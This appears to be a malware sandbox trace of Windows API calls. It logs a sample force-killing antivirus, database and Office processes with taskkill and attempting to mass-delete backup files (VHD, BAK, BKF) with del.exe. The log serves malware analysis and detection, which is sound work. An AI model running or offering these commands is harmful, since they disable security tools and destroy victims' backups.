[0147.889] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM isqlplussvc.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea04*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2499684 | out: lpCommandLine="\"taskkill.exe\" /IM isqlplussvc.exe /F", lpProcessInformation=0x2499684*(hProcess=0x5a0, hThread=0x50c, dwProcessId=0x1170, dwThreadId=0xc34)) returned 1 [0147.894] CloseHandle (hObject=0x4b0) returned 1 [0147.894] GetFileType (hFile=0x448) returned 0x3 [0147.894] CloseHandle (hObject=0x50c) returned 1 [0149.518] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.518] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x4b0, hWritePipe=0x6f7eac4*=0x504) returned 1 [0149.518] GetCurrentProcess () returned 0xffffffff [0149.518] GetCurrentProcess () returned 0xffffffff [0149.518] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x5a4) returned 1 [0149.518] CloseHandle (hObject=0x4b0) returned 1 [0149.519] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.519] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.519] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.519] CoTaskMemFree (pv=0x741d20) [0149.519] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM tmlisten.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x227577c | out: lpCommandLine="\"taskkill.exe\" /IM tmlisten.exe /F", lpProcessInformation=0x227577c*(hProcess=0x50c, hThread=0x4b0, dwProcessId=0x136c, dwThreadId=0x137c)) returned 1 [0149.529] CloseHandle (hObject=0x504) returned 1 [0149.529] GetFileType (hFile=0x5a4) returned 0x3 [0149.529] CloseHandle (hObject=0x4b0) returned 1 [0150.391] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0150.391] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x504, hWritePipe=0x6f7eac4*=0x558) returned 1 [0150.391] GetCurrentProcess () returned 0xffffffff [0150.391] GetCurrentProcess () returned 0xffffffff [0150.391] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x2c4) returned 1 [0150.391] CloseHandle (hObject=0x504) returned 1 [0150.391] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0150.391] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0150.391] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0150.392] CoTaskMemFree (pv=0x741d20) [0150.392] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM msftesql.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7ea0c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x250d0d8 | out: lpCommandLine="\"taskkill.exe\" /IM msftesql.exe /F", lpProcessInformation=0x250d0d8*(hProcess=0x4b0, hThread=0x504, dwProcessId=0xfd0, dwThreadId=0x90)) returned 1 [0150.401] CloseHandle (hObject=0x558) returned 1 [0150.401] GetFileType (hFile=0x2c4) returned 0x3 [0150.401] CloseHandle (hObject=0x504) returned 1 [0150.402] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.708] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0150.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0151.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.329] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.559] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.612] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0152.698] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0154.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0155.998] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0155.998] CreatePipe (in: hReadPipe=0x6f7eac8, hWritePipe=0x6f7eac4, lpPipeAttributes=0x6f7ea48, nSize=0x0 | out: hReadPipe=0x6f7eac8*=0x5dc, hWritePipe=0x6f7eac4*=0x558) returned 1 [0155.998] GetCurrentProcess () returned 0xffffffff [0155.998] GetCurrentProcess () returned 0xffffffff [0155.998] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6f7eacc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6f7eacc*=0x5a4) returned 1 [0155.998] CloseHandle (hObject=0x5dc) returned 1 [0155.998] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0155.998] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0155.998] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0155.999] CoTaskMemFree (pv=0x741d20) [0155.999] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"del.exe\" /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x6f7e964*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x558, hStdError=0x0), lpProcessInformation=0x25701c8 | out: lpCommandLine="\"del.exe\" /s /f /q h:\\*.VHD h:\\*.bac h:\\*.bak h:\\*.wbcat h:\\*.bkf h:\\Backup*.* h:\\backup*.* h:\\*.set h:\\*.win h:\\*.dsk", lpProcessInformation=0x25701c8*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0155.999] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x6f7e898, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0156.000] CloseHandle (hObject=0x558) returned 1 [0156.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.010] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.014] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.019] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.285] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.496] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0156.699] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0157.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0177.558] CoUninitialize () Thread: id = 730 os_tid = 0x5c8 Thread: id = 769 os_tid = 0x11a8 [0131.859] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.859] CoGetContextToken (in: pToken=0x70bf0e4 | out: pToken=0x70bf0e4) returned 0x0 [0131.860] IUnknown:QueryInterface (in: This=0x6ded28, riid=0x74b4d8c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x70bf108 | out: ppvObject=0x70bf108*=0x6ded34) returned 0x0 [0131.860] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ded34, pThreadType=0x70bf134 | out: pThreadType=0x70bf134*=0) returned 0x0 [0131.860] IUnknown:Release (This=0x6ded34) returned 0x1 [0131.860] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0131.860] CoUninitialize () [0133.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.766] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.771] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.773] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.776] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.782] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.783] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.785] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.792] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.794] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.797] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.806] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.807] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.811] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0133.827] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0134.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0135.854] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0136.275] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0136.592] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0136.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0136.929] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.482] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.770] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0137.891] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.232] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.281] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.303] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.313] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.321] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.338] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.854] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.085] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.087] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.100] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.174] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.748] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.561] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.653] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.654] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.685] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.725] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.726] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.763] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.818] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0140.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.227] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.282] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.340] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.629] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0141.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.339] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.562] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.603] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.605] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.614] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.616] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.658] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.336] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.739] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.739] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x50c, hWritePipe=0x70bea64*=0x4b0) returned 1 [0147.740] GetCurrentProcess () returned 0xffffffff [0147.740] GetCurrentProcess () returned 0xffffffff [0147.740] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x590) returned 1 [0147.740] CloseHandle (hObject=0x50c) returned 1 [0147.740] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.740] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.740] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.740] CoTaskMemFree (pv=0x741d20) [0147.740] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM Ntrtscan.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x2498dd0 | out: lpCommandLine="\"taskkill.exe\" /IM Ntrtscan.exe /F", lpProcessInformation=0x2498dd0*(hProcess=0x418, hThread=0x50c, dwProcessId=0xca8, dwThreadId=0xe34)) returned 1 [0147.842] CloseHandle (hObject=0x4b0) returned 1 [0147.842] GetFileType (hFile=0x590) returned 0x3 [0147.842] CloseHandle (hObject=0x50c) returned 1 [0148.951] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0148.951] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0148.952] GetCurrentProcess () returned 0xffffffff [0148.952] GetCurrentProcess () returned 0xffffffff [0148.952] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x444) returned 1 [0148.952] CloseHandle (hObject=0x4b0) returned 1 [0148.952] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0148.952] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0148.952] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0148.953] CoTaskMemFree (pv=0x741d20) [0148.953] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM msaccess.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x2277cf4 | out: lpCommandLine="\"taskkill.exe\" /IM msaccess.exe /F", lpProcessInformation=0x2277cf4*(hProcess=0x524, hThread=0x4b0, dwProcessId=0x12f8, dwThreadId=0x124c)) returned 1 [0149.430] CloseHandle (hObject=0x504) returned 1 [0149.430] GetFileType (hFile=0x444) returned 0x3 [0149.431] CloseHandle (hObject=0x4b0) returned 1 [0149.570] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.570] CreatePipe (in: hReadPipe=0x70bea68, hWritePipe=0x70bea64, lpPipeAttributes=0x70be9e8, nSize=0x0 | out: hReadPipe=0x70bea68*=0x4b0, hWritePipe=0x70bea64*=0x504) returned 1 [0149.570] GetCurrentProcess () returned 0xffffffff [0149.570] GetCurrentProcess () returned 0xffffffff [0149.570] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x70bea6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x70bea6c*=0x520) returned 1 [0149.570] CloseHandle (hObject=0x4b0) returned 1 [0149.570] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.570] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.570] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.571] CoTaskMemFree (pv=0x741d20) [0149.571] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM outlook.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x70be9ac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x504, hStdError=0x0), lpProcessInformation=0x25025dc | out: lpCommandLine="\"taskkill.exe\" /IM outlook.exe /F", lpProcessInformation=0x25025dc*(hProcess=0x598, hThread=0x4b0, dwProcessId=0x10a4, dwThreadId=0x10ac)) returned 1 [0149.575] CloseHandle (hObject=0x504) returned 1 [0149.575] GetFileType (hFile=0x520) returned 0x3 [0149.575] CloseHandle (hObject=0x4b0) returned 1 [0149.576] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.576] 